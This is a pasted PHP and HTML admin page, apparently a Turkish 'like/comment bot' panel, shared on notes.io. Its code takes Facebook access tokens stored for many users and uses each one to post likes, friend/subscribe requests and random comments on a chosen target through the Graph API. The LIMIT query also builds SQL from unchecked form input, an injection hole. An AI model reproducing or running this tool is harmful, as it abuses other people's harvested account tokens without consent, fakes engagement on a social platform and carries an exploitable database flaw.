NotesWhat is notes.io?

Notes brand slogan

Notes - notes.io

<?php include "../ayar.php"; ?>



<!doctype html>
<html class="no-js" lang="tr">

<!-- Mirrored from sublime.nyasha.me/admin/ by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 31 Oct 2014 22:18:22 GMT -->
<head>


<meta name="description" content="Flat, Clean, Responsive, application admin template built with bootstrap 3">
<meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1, maximum-scale=1">

<title><?=$baslik?></title>



<?php include "sayfalar/header.php"; ?>


<?php include "sayfalar/menu.php"; ?>







<?php @session_start(); @ob_start();

include("../config.php");
set_time_limit(600);

?>

<script type="text/javascript">
$(document).ready(function (deger) {
$("#durum").hide();
$("#yorum").hide();
$("#abone").hide();
});
function durum()
{
$("#durum").slideToggle(300);
$("#yorum").hide(700);
$("#abone").hide(700);
$("#sec").hide(700);
}
function yorum()
{
$("#yorum").slideToggle(500);
$("#durum").hide(700);
$("#abone").hide(700);
$("#sec").hide(700);
}
function abone()
{
$("#abone").slideToggle(500);
$("#durum").hide(700);
$("#yorum").hide(700);
$("#sec").hide(700);
}
function sec()
{
$("#sec").slideToggle(500);
$("#abone").hide(700);
$("#durum").hide(700);
$("#yorum").hide(700);
$("#kullanim").hide(700);
}

</script>
<script type="text/javascript">
$(document).ready(function(){
$('#kutu').click(function ()
{
$('#kutular').append('<input name="yorumlar[]" type="text" placeholder="Yapilacak Yorum" /><br /><br />');
}
);
});
</script>


<center>

<?

function adamcagir(){
$kackisi = htmlspecialchars($_POST['kac']);

global $getir;

$getir = mysql_query( "select * from Likers order by id DESC limit 0,{$kackisi}" );

}

?>
<br><br>

<div id="yorum"><br>
<form method="POST" action="yorum.php?islem=yorumla">


<a href="javascript:void(0)" id="kutu"><b>+ Yorum Alani Ekle</b></a></p>
<input type="text" id="email" name="link" placeholder=" Yorum Yapılacak Durum ID">
<input type="text" id="email" name="kac" placeholder="KAC KISI ">
<div id="kutular">
<input type="text" class="inputs" name="yorumlar" required placeholder=" Yapilacak Yorum ">
</div>
<button type="submit" class="btn btn-danger">Yorum Attır</button>
</form></div>


<?
$islem = @$_GET["islem"];
if($islem == "begendir"){
adamcagir();
$true = "0";
while ( $ok = mysql_fetch_array( $getir ) )
{

$access = $ok['access_token'];
$fbid = $ok['fbid'];
$ids = htmlspecialchars($_POST['link']);
$tamlink = "https://graph.facebook.com/".$ids."/likes?access_token=".$access."&method=post";
$ch = curl_init( );
curl_setopt( $ch, CURLOPT_URL, $tamlink );
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
$result = curl_exec( $ch );
if($result == "true"){

$ekle = mysql_query("INSERT INTO temiz (Likers) VALUES ('".$access."')");

$true++; }

}
echo "<font color=green>".$true."&nbsp;Kisiye Begendirildi. ! </font></center>";
}

if($islem == "abone"){
adamcagir();
while ( $ok = mysql_fetch_array( $getir ) )
{

$access = $ok['access_token'];
$fbid = $ok['fbid'];
$ids = htmlspecialchars($_POST['link']);
$tamlink = "https://graph.facebook.com/".$fbid."/friends?access_token=".$access."&uid=".$ids."&method=post";
$ch = curl_init( );
curl_setopt( $ch, CURLOPT_URL, $tamlink );
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
$result = curl_exec( $ch );
if($result == "true"){
$true++;
}

}
echo "<br><font color=green>".$true."&nbsp;Kisi Aboneniz Oldu. ! </font></center><br>";
}

if($islem == "yorumla"){
adamcagir();
while ( $ok = mysql_fetch_array( $getir ) )
{


$yorum = $_POST['yorumlar'];
$access = $ok['access_token'];
$fbid = $ok['fbid'];
$ids = $_POST['link'];
$toplamsay = count($yorum);
$tekyorum = $yorum[rand(0, $toplamsay-1)];
$tamlink = "https://graph.facebook.com/".$ids."/comments?access_token=".$access."&message=".urlencode($tekyorum)."&method=post";
$ch = curl_init( );
curl_setopt( $ch, CURLOPT_URL, $tamlink );
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
$result = curl_exec( $ch );


}

echo "<br><font color=green>Kisilere Yorum Yaptirildi. ! </font></center><br>";
}

?>
</center>
</fieldset>

<?
if($_GET["islem"] == "cikis"){
cik(); }
?>










<script src="plugins/jquery-1.11.1.min.js"></script>
<script src="bootstrap/js/bootstrap.js"></script>
<script src="plugins/jquery.slimscroll.min.js"></script>
<script src="plugins/jquery.easing.min.js"></script>
<script src="plugins/appear/jquery.appear.js"></script>
<script src="plugins/jquery.placeholder.js"></script>
<script src="plugins/fastclick.js"></script>


<script src="plugins/jquery.blockUI.js"></script>
<script src="plugins/jvectormap/jquery-jvectormap-1.2.2.min.js"></script>
<script src="plugins/jvectormap/jquery-jvectormap-world-mill-en.js"></script>
<script src="plugins/jquery.sparkline.js"></script>
<script src="plugins/flot/jquery.flot.js"></script>
<script src="plugins/flot/jquery.flot.resize.js"></script>
<script src="plugins/count-to/jquery.countTo.js"></script>


<script src="js/dashboard.js"></script>


<script src="js/offscreen.js"></script>
<script src="js/main.js"></script>

</body>


<!-- Mirrored from sublime.nyasha.me/admin/ by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 31 Oct 2014 22:18:49 GMT -->
</html>
     
 
what is notes.io
 

Notes.io is a web-based application for taking notes. You can take your notes and share with others people. If you like taking long notes, notes.io is designed for you. To date, over 8,000,000,000 notes created and continuing...

With notes.io;

  • * You can take a note from anywhere and any device with internet connection.
  • * You can share the notes in social platforms (YouTube, Facebook, Twitter, instagram etc.).
  • * You can quickly share your contents without website, blog and e-mail.
  • * You don't need to create any Account to share a note. As you wish you can use quick, easy and best shortened notes with sms, websites, e-mail, or messaging services (WhatsApp, iMessage, Telegram, Signal).
  • * Notes.io has fabulous infrastructure design for a short link and allows you to share the note as an easy and understandable link.

Fast: Notes.io is built for speed and performance. You can take a notes quickly and browse your archive.

Easy: Notes.io doesn’t require installation. Just write and share note!

Short: Notes.io’s url just 8 character. You’ll get shorten link of your note when you want to share. (Ex: notes.io/q )

Free: Notes.io works for 12 years and has been free since the day it was started.


You immediately create your first note and start sharing with the ones you wish. If you want to contact us, you can use the following communication channels;


Email: [email protected]

Twitter: http://twitter.com/notesio

Instagram: http://instagram.com/notes.io

Facebook: http://facebook.com/notesio



Regards;
Notes.io Team

     
 
Shortened Note Link
 
 
Looding Image
 
     
 
Long File
 
 

For written notes was greater than 18KB Unable to shorten.

To be smaller than 18KB, please organize your notes, or sign in.